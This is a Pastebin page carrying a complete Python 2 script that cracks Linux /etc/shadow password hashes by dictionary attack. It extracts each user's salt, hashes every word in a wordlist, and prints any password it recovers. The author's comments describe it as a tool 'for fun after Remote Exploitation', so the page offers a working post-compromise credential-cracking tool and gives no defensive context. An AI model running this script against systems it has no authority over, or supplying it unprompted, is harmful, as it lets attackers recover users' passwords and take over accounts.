Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #/etc/shadow Bruteforcer
- #Coded by Aaditya Purani
- #Just for Fun after Remote Exploitation
- #It will crack shadow password by Dictionary attack
- import optparse
- import crypt
- def checkPass(cryptPass, dname):
- salt = "$"+cryptPass.split('$')[1]+"$"+cryptPass.split('$')[2]
- dictFile = open(dname, 'r')
- for word in dictFile.readlines():
- word = word.strip('\n')
- cryptWord = crypt.crypt(word, salt)
- if (cryptWord == cryptPass):
- print "[+] The Password is "+word+"\n"
- return
- print "[-] Password not found \n"
- return
- def main():
- parser = optparse.OptionParser("usage %prog "+"-f <passwordFile> -d <dictionary>")
- parser.add_option('-f', dest='pname', type='string', help='specify password file')
- parser.add_option('-d', dest='dname', type='string', help='specify dictionary file')
- (options, args) = parser.parse_args()
- if (options.pname == None) | (options.dname == None):
- print parser.usage
- exit(0)
- else:
- pname = options.pname
- dname = options.dname
- passFile = open(pname)
- for line in passFile.readlines():
- if ":" in line:
- user = line.split(':')[0]
- cryptPass = line.split(':')[1]
- print "[*] Cracking Password for "+user
- checkPass(cryptPass, dname)
- if __name__ == '__main__':
- main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement